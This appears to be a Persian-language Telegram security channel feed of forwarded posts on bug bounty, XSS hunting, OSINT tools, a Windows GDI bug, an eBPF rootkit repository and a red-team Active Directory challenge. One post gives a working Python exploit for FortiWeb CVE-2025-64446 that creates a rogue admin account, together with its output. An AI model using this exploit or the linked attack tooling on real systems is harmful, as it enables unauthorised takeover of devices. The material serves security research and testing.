Forwarded from GO-TO CVE (| | Sharo K h | |)
Sin0x001
git_secret.go
یه ابزار برای دانلود کردن فایل های که قبلا از توی ریپو یه گیتهاب حذف شده
❤3👍1
Forwarded from PentesterLand Academy - Public
یه هکر اینجوری از داون شدن کلادفلیر استفاده میکنه
https://www.instagram.com/reel/DRMy7riDYbp/?igsh=MWI1ZmpwdXk3Y256Zw==
https://www.instagram.com/reel/DRMy7riDYbp/?igsh=MWI1ZmpwdXk3Y256Zw==
❤7👍1🤣1
Hunting for DOM-based XSS vulnerabilities: A complete guide
https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-dom-based-xss-vulnerabilities
@RadvanSec
https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-dom-based-xss-vulnerabilities
@RadvanSec
Intigriti
Hunting for DOM-based XSS vulnerabilities: A complete guide
Traditional cross-site noscripting (XSS) vulnerabilities were prevalent when server-side rendering (with languages like PHP, JSP, and ASP) was the norm. However, as applications become more complex and...
❤5
Forwarded from RedTeamAPT
سلام و وقت بخیر به همهی همراهان عزیز 🌹
به دلیل ریپورت شدن کانال قبلی @RedTeamApt از این پس فعالیت ما در کانال جدید ادامه خواهد داشت.
🔹 آدرس کانال جدید:
@RedTeamApt1
🔹 گروه جدید:
@RedTeamGP
ممنون از همراهی و حمایت همیشگی شما 🙏✨
به دلیل ریپورت شدن کانال قبلی @RedTeamApt از این پس فعالیت ما در کانال جدید ادامه خواهد داشت.
🔹 آدرس کانال جدید:
@RedTeamApt1
🔹 گروه جدید:
@RedTeamGP
ممنون از همراهی و حمایت همیشگی شما 🙏✨
❤3🙏1
RadvanSec
سلام و وقت بخیر به همهی همراهان عزیز 🌹 به دلیل ریپورت شدن کانال قبلی @RedTeamApt از این پس فعالیت ما در کانال جدید ادامه خواهد داشت. 🔹 آدرس کانال جدید: @RedTeamApt1 🔹 گروه جدید: @RedTeamGP ممنون از همراهی و حمایت همیشگی شما 🙏✨
کانال یکی از دوستانمون هست که ریپورت شده حتما دوست داشتید دنبالشون کنید مطالب خوبی میزارن 👌
❤3🙏1
Forwarded from KALI
ویندوز یه گاف گنده داده تو بخش گرافیکش؛ همون GDI که مسئول نشون دادن عکس و ایناست. یه سری فایل خاص مثل EMF / EMF+ وقتی باز میشن، ویندوز قشنگ قاطی میکنه چون یه جای کدش درست چک نکرده چی داره میخوره.
نتیجه؟
طرف فقط کافیه یه فایل تصویری عجیب برات بفرسته، تو هم باز کنی، و همون لحظه ویندوز میتونه کرش کنه، هنگ کنه، اطلاعات نشون بده جایی که نباید، یا بدتر — زمینه برای اجرای کد فراهم بشه. خلاصه یه خرابکاری تمیز.
مایکروسافت هم دید اوضاع داغونه، سریع یه پچ امنیتی داده تا این باگ رو ببنده.
اگه ویندوزت آپدیته، تقریباً خیالت راحت باشه.
اگه نه؟ خب دیگه… مثل اینه که در خونه رو باز گذاشته باشی و بگی خدا بزرگه 😅
@kali_signal
نتیجه؟
طرف فقط کافیه یه فایل تصویری عجیب برات بفرسته، تو هم باز کنی، و همون لحظه ویندوز میتونه کرش کنه، هنگ کنه، اطلاعات نشون بده جایی که نباید، یا بدتر — زمینه برای اجرای کد فراهم بشه. خلاصه یه خرابکاری تمیز.
مایکروسافت هم دید اوضاع داغونه، سریع یه پچ امنیتی داده تا این باگ رو ببنده.
اگه ویندوزت آپدیته، تقریباً خیالت راحت باشه.
اگه نه؟ خب دیگه… مثل اینه که در خونه رو باز گذاشته باشی و بگی خدا بزرگه 😅
@kali_signal
❤3👍2
#tools
#OSINT
#Offensive_security
POC : OSINT with LLM
https://github.com/mouna23/OSINT-with-LLM
// This repository demonstrates domain, IP, and email reconnaissance with LLM-powered security reporting
See also:
]-> RAG OSINT Tool
]-> LLM OSINT PoC Tool
]-> OSINT LLM Collector and Analyser
]-> AI-powered subdomain enumeration
tool with local LLM analysis via Ollama
@Radvansec
#OSINT
#Offensive_security
POC : OSINT with LLM
https://github.com/mouna23/OSINT-with-LLM
// This repository demonstrates domain, IP, and email reconnaissance with LLM-powered security reporting
See also:
]-> RAG OSINT Tool
]-> LLM OSINT PoC Tool
]-> OSINT LLM Collector and Analyser
]-> AI-powered subdomain enumeration
tool with local LLM analysis via Ollama
@Radvansec
❤5👍2
سلام بچه ها امیدوارم خوب باشید؛
لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه هست .
تاجایی باید پیش برید که یک قدم تا کشف آسیب پذیری فاصله داشته باشید و ادامه کار کاملا منوال باید باشه
شما باید حدااقل بتونید روزی ۵ آسیب پذیری ولید ازش گزارش کنید البته رویکردی که خود اتومیشن داره باید درست باشه و پیشنهاد این هست که VPS های متعدد داشته باشید که هرکدوم رویکرد مناسب داشته
باشن تا بتونید آسیب پذیری های متنوعی ازش گزارش کنید
نکته خیلی مهم : تمرکز روی یک آسیب پذیری خاص و نادیده گرفتن مابقی = سم (کار اشتباه)
نکته دوم : با AI ترکیب کنید فارغ از نتیجه ای که داره روند کار خیلی لذت بخش براتون خواهد بود 😁
⭐️ @RadvanSec
لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه هست .
تاجایی باید پیش برید که یک قدم تا کشف آسیب پذیری فاصله داشته باشید و ادامه کار کاملا منوال باید باشه
شما باید حدااقل بتونید روزی ۵ آسیب پذیری ولید ازش گزارش کنید البته رویکردی که خود اتومیشن داره باید درست باشه و پیشنهاد این هست که VPS های متعدد داشته باشید که هرکدوم رویکرد مناسب داشته
باشن تا بتونید آسیب پذیری های متنوعی ازش گزارش کنید
نکته خیلی مهم : تمرکز روی یک آسیب پذیری خاص و نادیده گرفتن مابقی = سم (کار اشتباه)
نکته دوم : با AI ترکیب کنید فارغ از نتیجه ای که داره روند کار خیلی لذت بخش براتون خواهد بود 😁
⭐️ @RadvanSec
🔥8👏1
RadvanSec
سلام بچه ها امیدوارم خوب باشید؛ لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه…
سلام دوستان لایو دوره خصوصی بوده و لایو پابلیک رسمی کانال نبوده اگر دوست دارید ری اکشن بدید یک لایو پابلیک بریم و کامل AI + Security و agent هایی که خودتون میتونید بسازید رو باهم درموردش صحبت کنیم
👍25👎1🔥1
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
https://github.com/kevin-mizu/domloggerpp
@Radvansec
Check it out! 👇
https://github.com/kevin-mizu/domloggerpp
@Radvansec
❤4👍1
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
So, based on THIS, you can get something like this:
⭐️ @RadvanSec
So, based on THIS, you can get something like this:
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
Output from the box:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
⭐️ @RadvanSec
Gist
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md
❤3👍2
Forwarded from GO-TO CVE
سوال ردتیم :
یک AD کامل پچشده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول میکشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیکهای ۲۰۲۵ که الان کار میکنن).
یک AD کامل پچشده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول میکشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیکهای ۲۰۲۵ که الان کار میکنن).
❤🔥3❤2
Forwarded from ReverseEngineering
A Linux eBPF rootkit with a backdoor C2 library injection execution hijacking persistence and stealth capabilities
https://github.com/h3xduck/TripleCross
@reverseengine
https://github.com/h3xduck/TripleCross
@reverseengine
GitHub
GitHub - h3xduck/TripleCross: A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and…
A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities. - h3xduck/TripleCross
❤3
Forwarded from PentesterLand Academy - Public
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن
https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن
https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==
Instagram
@pentesterland
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…
❤5👍2
OWASP_AI_Testing_Guide.pdf
6.2 MB
#MLSecOps
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo
// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle
@Radvansec
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo
// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle
@Radvansec
❤8
Forwarded from PentesterLand Academy - Public
اگه میخوای بیشتر XSS هات P2,P1 بشن از نکته زیر استفاده کن
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️🔥😉
https://x.com/pentesterlanden/status/1994795913488077214?s=46
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️🔥😉
https://x.com/pentesterlanden/status/1994795913488077214?s=46
X (formerly Twitter)
PentesterLand (@PentesterLandEn) on X
Consider incorporating SVG Smuggling and HTMLSmuggling vectors into your bug bounty reports(XSS).
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…
❤7